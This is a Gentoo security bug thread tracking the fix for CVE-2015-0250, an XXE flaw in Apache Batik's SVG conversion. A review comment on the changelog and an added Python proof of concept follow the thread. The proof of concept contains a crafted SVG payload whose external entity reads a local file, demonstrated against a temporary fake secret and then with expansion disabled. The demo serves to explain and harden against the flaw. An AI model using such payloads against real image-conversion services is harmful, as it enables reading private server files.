| Summary: | <dev-java/batik-1.8: incorrect SVG file handling (CVE-2015-0250) | | |
|---|---|---|---|
| Product: | Gentoo Security | Reporter: | Agostino Sarubbo <ago> |
| Component: | Vulnerabilities | Assignee: | Gentoo Security <security> |
| Status: | RESOLVED FIXED | | |
| Severity: | minor | CC: | java |
| Priority: | Normal | | |
| Version: | unspecified | | |
| Hardware: | All | | |
| OS: | Linux | | |
| URL: | https://bugzilla.redhat.com/show_bug.cgi?id=1203762 | | |
| Whiteboard: | B3 [noglsa] | | |
| Package list: | | Runtime testing required: | --- |
| Bug Depends on: | 551952, 551964, 553370 | | |
| Bug Blocks: | | | |
Description
Agostino Sarubbo
2015-03-20 08:50:00 UTC
CVE-2015-0250 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0250): XML external entity (XXE) vulnerability in the SVG to (1) PNG and (2) JPG conversion classes in Apache Batik 1.x before 1.8 allows remote attackers to read arbitrary files or cause a denial of service via a crafted SVG file.

As per URL: Fixed in Batik 1.8

Ping on ebuild for this. Has been around for some time.

+*batik-1.8 (07 Jun 2015)
+
+ 07 Jun 2015; Patrice Clement <monsieurp@gentoo.org> +batik-1.8.ebuild:
+ Version bump. Fix security bug 543858.
+

Please stabilise this package ASAP for the following platforms:
- amd64
- ppc
- ppc64
- x86

=dev-java/batik-1.8

Stable target: amd64 ppc ppc64 x86

amd64 stable

x86 stable

ping @ppc @ppc64

ppc stable

ppc64 stable.

Maintainer(s), please clean up. Security, please vote.

+ 22 Jun 2015; Patrice Clement <monsieurp@gentoo.org> -batik-1.7-r3.ebuild:
+ Remove vulnerable version. Fix security bug 551952.
+

I did remove batik-1.7 but we have the following ebuilds relying on it:

app-misc/freemind/freemind-1.0.1.ebuild
dev-java/fop/fop-1.1.ebuild
dev-java/jcharts/jcharts-0.7.5-r2.ebuild

Sorry, we can't clean it up just yet.

I've revbumped batik-1.8 and stabilised it while at it because of a new dep on xmlgraphics-common:2.0 (see bug 553370).

+*batik-1.8-r1 (27 Jun 2015)
+
+ 27 Jun 2015; Patrice Clement <monsieurp@gentoo.org> +batik-1.8-r1.ebuild:
+ xmlgraphics-common dependency bump from :1.5 to :2.
+

Dependencies clean up:

+ 27 Jun 2015; Patrice Clement <monsieurp@gentoo.org> -freemind-0.9.0-r1.ebuild,
+ -freemind-1.0.0-r1.ebuild, -freemind-1.0.1.ebuild:
+ Remove old.
+
+ 27 Jun 2015; Patrice Clement <monsieurp@gentoo.org> -fop-0.95.ebuild,
+ -fop-1.1.ebuild:
+ Remove old.
+
+ 27 Jun 2015; Patrice Clement <monsieurp@gentoo.org>
+ -files/xmlgraphics-commons-1.5-disable-iccprofile-test.patch,
+ -xmlgraphics-commons-1.2-r1.ebuild, -xmlgraphics-commons-1.3.1.ebuild,
+ -xmlgraphics-commons-1.5.ebuild:
+ Remove old.
+

Vulnerable version clean up:

+ 27 Jun 2015; Patrice Clement <monsieurp@gentoo.org> -batik-1.7-r3.ebuild,
+ -batik-1.8.ebuild, batik-1.8-r1.ebuild:
+ Remove vulnerable version. Fix security bug 543858.
+

Clean up done. Security, please vote.

I missed this bit in my last comment:

+ 27 Jun 2015; Patrice Clement <monsieurp@gentoo.org> -jcharts-0.7.5-r2.ebuild:
+ Remove old.
+

GLSA Vote: No

GLSA Vote: No

Thank you all. Closing as noglsa.
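Review bot: the 27 Jun 2015 entry under "Vulnerable version clean up" removes batik-1.8.ebuild with the message "Remove vulnerable version", but batik-1.8 is the release that carries the CVE-2015-0250 fix (07 Jun entry: "Version bump. Fix security bug 543858"); it is being dropped because batik-1.8-r1 supersedes it after the xmlgraphics-common :2 dependency bump, and the entry should say so, e.g. "Remove vulnerable 1.7-r3 and superseded 1.8." The removal of batik-1.7-r3.ebuild is also logged twice with different bug references, 551952 on 22 Jun and 543858 on 27 Jun; one reference, or both, should be used consistently.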
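The XXE class named in the report, shown as an added example with Python's standard-library SAX parser standing in for an SVG rasteriser; this is not Batik code and not part of the bug thread. It builds a constructed SVG whose DOCTYPE declares an external general entity pointing at a throwaway local file and references it from a `<text>` node, then parses it once with external entity resolution enabled (the behaviour the report attributes to Batik before 1.8) and once with it disabled. The template, the `TextCollector`/`render_text`/`demo_xxe` names and the fake "secret" file are assumptions made for the demonstration.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed SVG payload (an assumption for this demo, modelled on the XXE
# class in the report): the DOCTYPE declares an external general entity that
# points at a local file and a <text> node references it, so a converter that
# expands external entities draws the file's contents into the rendered image.
SVG_XXE_TEMPLATE = """<?xml version="1.0"?>
<!DOCTYPE svg [
  <!ENTITY xxe SYSTEM "file://{path}">
]>
<svg xmlns="http://www.w3.org/2000/svg" width="300" height="40">
  <text x="10" y="25">&xxe;</text>
</svg>
"""


class TextCollector(ContentHandler):
    """Collect the character data of every <text> element; this stands in
    for the part of a rasteriser that turns SVG text into pixels."""

    def __init__(self):
        super().__init__()
        self._in_text = False
        self.chunks = []

    def startElement(self, name, attrs):
        if name == "text":
            self._in_text = True

    def endElement(self, name):
        if name == "text":
            self._in_text = False

    def characters(self, content):
        if self._in_text:
            self.chunks.append(content)


def render_text(svg_bytes, resolve_external_entities):
    """Parse the SVG and return the text a renderer would draw.

    resolve_external_entities=True mimics a converter that expands external
    general entities (the pre-1.8 behaviour described in the report).
    False is the hardened setting: the entity reference expands to nothing
    and no file is opened.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(svg_bytes))
    return "".join(handler.chunks)


def demo_xxe():
    """Write a throwaway 'secret' file, build the payload against it and
    return (vulnerable_output, hardened_output)."""
    # Constructed stand-in for a line of /etc/passwd; never touches the real file.
    secret = "root:x:0:0:root:/root:/bin/bash"
    with tempfile.TemporaryDirectory() as tmp:
        target = os.path.join(tmp, "secret.txt")
        with open(target, "w", encoding="utf-8") as fh:
            fh.write(secret)
        payload = SVG_XXE_TEMPLATE.format(path=target).encode("utf-8")
        leaked = render_text(payload, resolve_external_entities=True)
        hardened = render_text(payload, resolve_external_entities=False)
    return leaked, hardened


if __name__ == "__main__":
    leaked, hardened = demo_xxe()
    print("entity expansion on :", repr(leaked))
    print("entity expansion off:", repr(hardened))
```

With expansion on, the file's contents come back as the text to draw, which is exactly how a crafted SVG turns an image-conversion service into a file-read oracle: the leaked bytes end up in the PNG or JPG handed back to the requester. With expansion off, the reference expands to an empty string and no file is opened; the same switch also stops the denial-of-service variant (an entity pointing at a blocking device or an endless stream), at the cost of refusing legitimate external DTDs, which an SVG converter has no reason to honour.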